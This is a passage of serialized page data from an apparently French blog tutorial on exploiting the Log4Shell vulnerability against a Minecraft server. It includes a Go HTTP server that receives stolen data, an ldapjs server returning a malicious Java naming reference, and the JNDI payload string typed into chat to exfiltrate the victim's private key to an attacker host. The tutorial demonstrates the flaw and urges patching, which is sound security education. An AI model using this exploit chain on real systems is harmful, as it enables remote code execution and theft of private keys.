ioutil.",[400,1103,1104],{"class":1014},"N",[400,1106,1107],{"class":409},"op",[400,1109,1110],{"class":1014},"C",[400,1112,1113],{"class":409},"loser(bytes.",[400,1115,1104],{"class":1014},[400,1117,1118],{"class":409},"ew",[400,1120,1093],{"class":1014},[400,1122,1123],{"class":409},"uffer(buf))\n",[400,1125,1126,1129,1132],{"class":402,"line":506},[400,1127,1128],{"class":409},"    log.",[400,1130,1131],{"class":1014},"P",[400,1133,1134],{"class":409},"rintf(\"secret data: %q\", rdr1)\n",[400,1136,1137],{"class":402,"line":514},[400,1138,969],{"class":409},[400,1140,1141],{"class":402,"line":539},[400,1142,479],{"emptyLinePlaceholder":17},[400,1144,1145],{"class":402,"line":556},[400,1146,1147],{"class":409},"func main() {\n",[400,1149,1150,1153,1156,1159,1162,1165,1168],{"class":402,"line":567},[400,1151,1152],{"class":409},"    fs := http.",[400,1154,1155],{"class":1014},"F",[400,1157,1158],{"class":409},"ile",[400,1160,1161],{"class":1014},"S",[400,1163,1164],{"class":409},"erver(http.",[400,1166,1167],{"class":1014},"D",[400,1169,1170],{"class":409},"ir(\".\u002Fjava\"))\n",[400,1172,1173,1176,1178,1181,1184,1187,1189,1192,1194,1197,1199,1202],{"class":402,"line":583},[400,1174,1175],{"class":409},"    http.",[400,1177,1054],{"class":1014},[400,1179,1180],{"class":409},"andle(\"\u002F",[400,1182,1183],{"class":1014},"static",[400,1185,1186],{"class":409},"\u002F\", http.",[400,1188,1161],{"class":1014},[400,1190,1191],{"class":409},"trip",[400,1193,1131],{"class":1014},[400,1195,1196],{"class":409},"refix(\"\u002F",[400,1198,1183],{"class":1014},[400,1200,1201],{"class":409},"\u002F\", fs)) ",[400,1203,1205],{"class":1204},"sJ8bj","\u002F\u002F 1\n",[400,1207,1208,1210,1212,1215,1217,1220,1222,1225],{"class":402,"line":588},[400,1209,1175],{"class":409},[400,1211,1054],{"class":1014},[400,1213,1214],{"class":409},"andle",[400,1216,1155],{"class":1014},[400,1218,1219],{"class":409},"unc(\"\u002Fdata\", data",[400,1221,1054],{"class":1014},[400,1223,1224],{"class":409},"andler) ",[400,1226,1227],{"class":1204},"\u002F\u002F 2\n",[400,1229,1230],{"class":402,"line":603},[400,1231,479],{"emptyLinePlaceholder":17},[400,1233,1234,1237,1240],{"class":402,"line":608},[400,1235,1236],{"class":409},"    println(\"waiting ",[400,1238,1239],{"class":1014},"for",[400,1241,1242],{"class":409}," secret data\")\n",[400,1244,1245,1247,1250,1253,1255,1258,1260,1263,1266],{"class":402,"line":654},[400,1246,1175],{"class":409},[400,1248,1249],{"class":1014},"L",[400,1251,1252],{"class":409},"isten",[400,1254,1087],{"class":1014},[400,1256,1257],{"class":409},"nd",[400,1259,1161],{"class":1014},[400,1261,1262],{"class":409},"erve(\":",[400,1264,1265],{"class":1014},"8080",[400,1267,1268],{"class":409},"\", nil)\n",[400,1270,1271],{"class":402,"line":660},[400,1272,969],{"class":409},[343,1274,1275],{},"Ce bout de code en go fait tourner un serveur http qui fait deux choses simples :",[1277,1278,1279,1292],"ol",{},[1280,1281,1282,1283,1286,1287,1289,1290],"li",{},"Il sert sur la route ",[357,1284,1285],{},"\u002Fstatic"," le fichier ",[357,1288,979],{}," qui est dans le dossier ",[357,1291,396],{},[1280,1293,1294,1295,1298,1299,1302],{},"Il écoute sur la route ",[357,1296,1297],{},"\u002Fdata"," et affiche le ",[357,1300,1301],{},"body"," de la requête. C’est sur ce endpoint qu’on\nrecevra la clé privée envoyée par le script java malicieux.",[343,1304,1305,1306,980],{},"Enfin on démarre un serveur ldap. Pour cela, on utilise le package npm\n",[1307,1308,1312],"a",{"href":1309,"rel":1310},"https:\u002F\u002Fwww.npmjs.com\u002Fpackage\u002Fldapjs",[1311],"nofollow","ldapjs",[392,1314,1319],{"className":1315,"code":1317,"language":1318},[1316],"language-text","const ldap = require('ldapjs');\n\nconst server = ldap.createServer();\n\nserver.search('', (req, res, next) => {\n    const obj = {\n        dn: req.dn.toString(),\n        attributes: {\n            javaClassName: \"MinecraftRCE\",\n            javaCodeBase: \"\u003Chttp:\u002F\u002F192.168.1.22:8080\u002Fstatic\u002F>\",\n            objectClass: \"javaNamingReference\",\n            javaFactory: \"MinecraftRCE\",\n        }\n    };\n\n    res.send(obj);\n\n    res.end();\n});\n\nserver.listen(1389, () => {\n    console.log('LDAP server listening at %s', server.url);\n});\n","text",[357,1320,1317],{"__ignoreMap":11},[343,1322,1323],{},"On lance ce serveur avec node :",[343,1325,1326],{},[357,1327,1328],{},"node index.js",[343,1330,1331],{},"Tout est en place pour passer à l’action. On se connecte au serveur minecraft comme un joueur normal\net on peut déclencher l’attaque. Pour ce faire il suffit de taper dans le chat le texte suivant :",[343,1333,1334],{},[357,1335,1336],{},"${jndi:ldap:\u002F\u002F192.168.1.22:1389}",[343,1338,1339],{},[371,1340],{"alt":11,"src":1341},"\u002Fimages\u002Ffinal-hacked.png",[343,1343,1344,1345,1347],{},"C’est cette chaîne de caractères qui sera envoyée à log4j. Aussitôt qu’on a appuyé sur entrée on\nreçoit bien la requête avec la clé privée de la victime sur notre endpoint http ",[357,1346,1297],{},".",[343,1349,1350],{},[371,1351],{"alt":11,"src":1352},"\u002Fimages\u002Fconsole-hacked.png",[343,1354,1355],{},"On reçoit même la requête 3 fois, sans doute parce que la chaîne est loggée 3 fois dans le code de\nminecraft.",[343,1357,1358],{},"Nous avons donc démontré que la faille log4shell peut facilement être exploitée. Dans notre exemple\nassez simple on s’est contenté de lire la clé privée, mais ce n’est pas la seule exploitation\npossible. C’est pourquoi il est fortement recommandé de garder ses logiciels à jour.",[343,1360,1361],{},[1307,1362,1363],{"href":1363,"rel":1364},"https:\u002F\u002Fsecurity.googleblog.com\u002F2021\u002F12\u002Funderstanding-impact-of-apache-log4j.html",[1311],[343,1366,1367],{},[1307,1368,1369],{"href":1369,"rel":1370},"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=7qoPDq41xhQ",[1311],[343,1372,1373],{},[1307,1374,1375],{"href":1375,"rel":1376},"https:\u002F\u002Fnews.fr-24.com\u002Ftechnology\u002F591640.html",[1311],[343,1378,1379],{},[1307,1380,1381],{"href":1381,"rel":1382},"https:\u002F\u002Fstackoverflow.blog\u002F2022\u002F01\u002F19\u002Fheres-how-stack-overflow-users-responded-to-log4shell-the-log4j-vulnerability-affecting-almost-everyone\u002F?utm_source=Iterable&utm_medium=email&utm_campaign=the_overflow_newsletter",[1311],[343,1384,1385],{},[1307,1386,1387],{"href":1387,"rel":1388},"https:\u002F\u002Fsecurityboulevard.com\u002F2021\u002F12\u002Flog4shell-jndi-injection-via-attackable-log4j\u002F",[1311],[1390,1391,1392],"style",{},"html pre.shiki code .szBVR, html code.shiki .szBVR{--shiki-default:#D73A49;--shiki-dark:#F97583}html pre.shiki code .sVt8B, html code.shiki .sVt8B{--shiki-default:#24292E;--shiki-dark:#E1E4E8}html pre.shiki code .sScJk, html code.shiki .sScJk{--shiki-default:#6F42C1;--shiki-dark:#B392F0}html pre.shiki code .sZZnC, html code.shiki .sZZnC{--shiki-default:#032F62;--shiki-dark:#9ECBFF}html pre.shiki code .sj4cs, html code.shiki .sj4cs{--shiki-default:#005CC5;--shiki-dark:#79B8FF}html pre.shiki code .s4XuR, html code.shiki .s4XuR{--shiki-default:#E36209;--shiki-dark:#FFAB70}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html pre.shiki code .s7hpK, html code.shiki .s7hpK{--shiki-default:#B31D28;--shiki-default-font-style:italic;--shiki-dark:#FDAEB7;--shiki-dark-font-style:italic}html pre.shiki code .sJ8bj, html code.shiki .sJ8bj{--shiki-default:#6A737D;--shiki-dark:#6A737D}",{"title":11,"searchDepth":12,"depth":12,"links":1394},[1395,1396,1397],{"id":340,"depth":12,"text":341},{"id":348,"depth":12,"text":349},{"id":363,"depth":12,"text":364},"2022-03-24","Log4j est une des librairies de log parmi les plus utilisées par les applications codées en java. La liste des entreprises qui l'utilise est longue","fr",{},"\u002Farticles\u002F2022-03-24-comprendre-et-exploiter-la-faille-log4shell",{"title":333,"description":1399},"articles\u002F2022-03-24-comprendre-et-exploiter-la-faille-log4shell",[1406],"Tech","Ik9XPVlsdrX7iS4nx7RL8IOua4PFduRgPAuqadw6oo0",1778159244031]